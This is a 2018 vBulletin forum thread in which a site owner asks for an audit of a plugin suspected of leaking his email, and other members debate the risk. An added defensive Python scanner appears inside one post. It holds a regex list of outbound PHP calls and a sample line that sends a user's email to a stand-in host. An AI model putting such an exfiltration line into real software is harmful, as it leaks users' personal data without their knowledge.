  #1  
Old 27 Jan 2018, 15:47
X-or X-or is offline
 
Join Date: Nov 2005
suspicious plugin?

https://www.vbulletin.org/forum/showthread.php?t=324918

Can someone audit this plugin for potential malicious code?
The nonsensical results of the plugin and the apathy of the author are worrying me a lot.
Here's a mirror : https://www.sendspace.com/file/05icvb
  #2  
Old 27 Jan 2018, 18:14
Dave Dave is offline
 
Join Date: Jun 2010
Real name: Dave
It seems fine to me at first sight, what makes you think it could contain malware?
__________________
https://technidev.com - security, development, exploits, vBulletin
dave[at]technidev[dot]com

Contact me for custom vBulletin 3/4 work & server/website management.
  #3  
Old 27 Jan 2018, 23:33
X-or X-or is offline
 
Join Date: Nov 2005
First the product shows nonsensical results which were reported, but the author didn't react.
Secondly the product definitely uses external content and the author didn't put the proper warning, for example in admincp/slowplugins.php

line 15 : <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

I have recently received an email on a mail address I have never used besides receiving notification from my vbulletin, I'm trying to find where is the backdoor and this one product seems to be the most suspicious of all, it has left tons of data in the sql database even after uninstall.

I think the code of this product should definitely be audited.
  #4  
Old 28 Jan 2018, 01:58
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Real name: Kris
Originally Posted by X-or View Post
First the product shows nonsensical results which were reported, but the author didn't react.
Secondly the product definitely uses external content and the author didn't put the proper warning, for example in admincp/slowplugins.php

line 15 : <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

I have recently received an email on a mail address I have never used besides receiving notification from my vbulletin, I'm trying to find where is the backdoor and this one product seems to be the most suspicious of all, it has left tons of data in the sql database even after uninstall.

I think the code of this product should definitely be audited.
Jquery isn't malicious code. Virtually every software program uses it. Hell, vBulletin uses it.
  #5  
Old 28 Jan 2018, 22:05
vBNinja vBNinja is offline
 
Join Date: May 2011
Not sure if trolling... jQuery loaded from google’s cdn is malicious code? I don’t even understand what exactly you claim to be malicious.

Also, why are you posting a mirror of it? It can be downloaded directly from the thread as it was posted.

What if your computer has malware and it infected the files you re-uploaded (without permission either)?

No one else has reported “malicious code” in it..

If you don’t like the product, simply uninstall it.
__________________
PM me for Custom Mod Requests/Work
  #6  
Old 29 Jan 2018, 17:09
Stingray27 Stingray27 is offline
 
Join Date: Jan 2006
Originally Posted by X-or View Post
Can someone audit this plugin for potential malicious code?
The nonsensical results of the plugin and the apathy of the author are worrying me a lot.
I think you worry too much.
There is nothing malicious about jQuery

What do you mean by "apathy of the author"
There are no rules that say authors have to respond within a certain time (or at all).

If the results are nonsensical to you then just don't use it. Problem solved.
  #7  
Old 30 Jan 2018, 14:30
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Originally Posted by X-or View Post
First the product shows nonsensical results which were reported, but the author didn't react.
Secondly the product definitely uses external content and the author didn't put the proper warning, for example in admincp/slowplugins.php

line 15 : <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

I have recently received an email on a mail address I have never used besides receiving notification from my vbulletin, I'm trying to find where is the backdoor and this one product seems to be the most suspicious of all, it has left tons of data in the sql database even after uninstall.

I think the code of this product should definitely be audited.
X-or never said that jquery was malicious, he said the call to jquery is use of external content, which it technically is. However when the flag for "Uses external content" was created (over a decade ago, probably closer to 15 years) it was intended for mods that used code presumably hosted by the mod creator, not necessarily open, public, and used all over the web.

In the decade and a half since the external code flag was created it has become much more common to link to safe, reliable, libraries hosted by sites like Google.

vBulletin does this too, but as an option. No one has to make external calls to Google to use vBulletin, but it's smart to do so.

Whether a call to external jquery rises to the level of needing to click the external content flag is a debate for site moderators, I can see good points for both sides.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.
  #8  
Old 01 Feb 2018, 19:58
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
This was already discussed prior in the thread and Joe even commented back then on it as well, reference: https://vbulletin.org/forum/showpost...&postcount=244

So it's use at your own risk as Joe mentioned, furthermore you can simply edit out the parts of the mod containing that code before you install on your site.
__________________
Daddy Does Dios and Figs!
https://www.linkedin.com/in/thelastsuperman - Custom vBulletin Modifications, Styles, and Services.
Need a Host? I recommend URLJet.

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
  #9  
Old 01 Feb 2018, 20:05
Dave Dave is offline
 
Join Date: Jun 2010
Real name: Dave
I checked the code and couldn't find the SQL injection backdoor, the email address gathering script is in there though but it doesn't do anything since the site it sends requests to is no longer online.
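
An added example, not part of any post in this thread and not code from the plugin under discussion: a first pass at the audit X-or asks for is to list every external host a plugin's files reference (such as the jQuery include quoted from admincp/slowplugins.php) and every PHP call that can send data out, which is where a request like the one Dave describes would show up. The second sample file, its host, and the allowlist are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumption: hosts the site owner has reviewed and accepts; adjust per policy.
ALLOWED_HOSTS = {"ajax.googleapis.com"}

# Absolute or protocol-relative URL; group 1 is the host. A comment such as
# "//config.php" also matches, so every hit is a lead to read, not a verdict.
URL_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)
# PHP functions able to open an outbound connection or send mail.
NET_CALL_RE = re.compile(
    r"\b(curl_init|curl_exec|fsockopen|pfsockopen|file_get_contents|fopen|mail)\s*\(",
    re.I)

# Constructed sample input. The first file holds the line quoted in the thread;
# the second file name, host and code are hypothetical.
SAMPLE = {
    "admincp/slowplugins.php":
        "<?php\n"
        '<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>\n',
    "includes/hypothetical_hook.php":
        "<?php\n"
        "$r = file_get_contents('http://stats.example.invalid/c.php?e=' . urlencode($email));\n",
}


def audit_sources(files):
    """files: {path: source text}. Returns (hosts, net_calls).

    hosts maps each referenced host to [(path, line_no)];
    net_calls lists (path, line_no, function) for outbound-capable calls.
    """
    hosts, net_calls = defaultdict(list), []
    for path, text in files.items():
        for no, line in enumerate(text.splitlines(), 1):
            for m in URL_RE.finditer(line):
                hosts[m.group(1).lower()].append((path, no))
            for m in NET_CALL_RE.finditer(line):
                net_calls.append((path, no, m.group(1).lower()))
    return dict(hosts), net_calls


def unreviewed_hosts(hosts):
    """Hosts the plugin references that are not on the reviewed allowlist."""
    return sorted(h for h in hosts if h not in ALLOWED_HOSTS)


if __name__ == "__main__":
    found, calls = audit_sources(SAMPLE)
    print("unreviewed hosts:", unreviewed_hosts(found))
    for path, no, fn in calls:
        print(f"{path}:{no}: outbound-capable call {fn}()")
```

For a real product, read each file of the unpacked archive (including the product XML, which carries the hook code) into the `files` mapping, then review every reported line by hand.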
  #10  
Old 02 Feb 2018, 00:53
IggyP IggyP is offline
 
Join Date: May 2012
Originally Posted by TheLastSuperman View Post
This was already discussed prior in the thread and Joe even commented back then on it as well, reference: https://vbulletin.org/forum/showpost...&postcount=244

So it's use at your own risk as Joe mentioned, furthermore you can simply edit out the parts of the mod containing that code before you install on your site.
hmm this is a different mod than the OP linked...fwiw...
  #11  
Old 02 Feb 2018, 12:50
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Originally Posted by IggyP View Post
hmm this is a different mod than the OP linked...fwiw...
Different mod and different mod author.
  #12  
Old 05 Feb 2018, 22:31
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
o.O apparently so ^ there were two reported posts and I clicked on the wrong link! Sometimes oversight is awesome.
  #13  
Old 08 Feb 2018, 04:01
X-or X-or is offline
 
Join Date: Nov 2005
Originally Posted by Dave View Post
I checked the code and couldn't find the SQL injection backdoor, the email address gathering script is in there though but it doesn't do anything since the site it sends requests to is no longer online.
Email address gathering script?
Isn't it against the rules?

--------------- Added 08 Feb 2018 at 22:30 ---------------

@Dave, could you please provide more details about this email gathering script? Sounds like a very malicious thing.
  #14  
Old 31 Jul 2018, 11:16
X-or X-or is offline
 
Join Date: Nov 2005
Nobody wants to audit this product, really?

Again I would like to stress the webmaster email was leaked after installing this product....
And maybe the whole database, who knows...
Also this is a product that outputs utterly nonsensical results which only adds to the suspicion
Is this site dead or something, why nobody looks into it
  #15  
Old 31 Jul 2018, 16:59
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Originally Posted by X-or View Post
Nobody wants to audit this product, really?

Again I would like to stress the webmaster email was leaked after installing this product....
And maybe the whole database, who knows...
Also this is a product that outputs utterly nonsensical results which only adds to the suspicion
Is this site dead or something, why nobody looks into it
All of the above? The mod hasn't been updated in over 5 years. It probably doesn't even work on PHP 7. If you are unsure about using it, don't use it. If the results are "nonsensical" then it is no loss.

Is the site dead? Not technically, we're posting here... but it is a fraction of what it used to be and even 5 years ago it was a fraction of what it was 5 years before that.